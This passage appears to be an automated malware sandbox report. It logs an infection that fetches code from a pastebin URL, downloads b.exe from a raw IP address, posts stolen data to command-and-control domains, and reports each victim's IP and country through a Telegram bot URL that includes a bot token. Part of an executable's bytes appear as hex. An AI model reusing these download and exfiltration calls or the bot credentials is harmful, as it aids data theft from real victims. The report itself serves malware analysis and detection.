00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 11:47:16 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 22 Nov 2024 15:53:53 GMTETag: "af000-6278263cd54f1"Accept-Ranges: bytesContent-Length: 716800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 08 00 00 00 00 00 00 00 00 00 00 00 00 20 09 00 48 00 00 00 00 00 00 00 00 00 00 00 6d 09 40 19 6b 07 61 16 5c ef 08 00 00 20 00 00 00 f0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 80 ef 01 00 00 20 09 00 00 f0 01 00 00 f4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 06 00 00 00 20 0b 00 00 08 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 ec 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 60 0b 00 00 02 00 00 00 ee 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown

DNS query: name: ipinfo.io

Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49734 -> 192.81.132.76:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49735 -> 192.81.132.76:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.184.174:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.20.3.235:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 104.20.3.235:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F7T7SFWO3V8ZTN3AJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E4SXMRUR15VLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8755Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F0AWCPRRPW8BEIFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=86OMU50YVUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1270Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PB87JFRCI72DMDXKZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1139Host: frogs-severz.sbs
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76
Source: unknown	TCP traffic detected without corresponding DNS query: 192.81.132.76

Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/NQfY14gm HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b.exe HTTP/1.1Host: 192.81.132.76Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: revirepart.biz
Source: global traffic	DNS traffic detected: DNS query: frogs-severz.sbs
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz

Source: powershell.exe, 00000011.00000002.1887480681.0000000005472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.81.132.76
Source: powershell.exe, 00000013.00000002.1895829639.0000000005232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.81.132.76/b.exe
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 0000000F.00000002.1784830664.0000000007082000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000028.00000002.2456306228.0000000007881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro/
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000022.00000002.2258625366.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000058CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.000000000532D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000054F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000011.00000002.1887480681.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1754027788.0000000007C12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co1
Source: powershell.exe, 00000011.00000002.1912945547.00000000077CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cou
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBdq
Source: rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2604425013.0000000007490000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 0000000B.00000002.1743928726.00000000056B1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1743019930.0000000007391000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742462510.00000000056B0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742259458.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: rundll32.exe, 0000000A.00000002.2603536788.0000000005070000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2601043112.0000000003355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
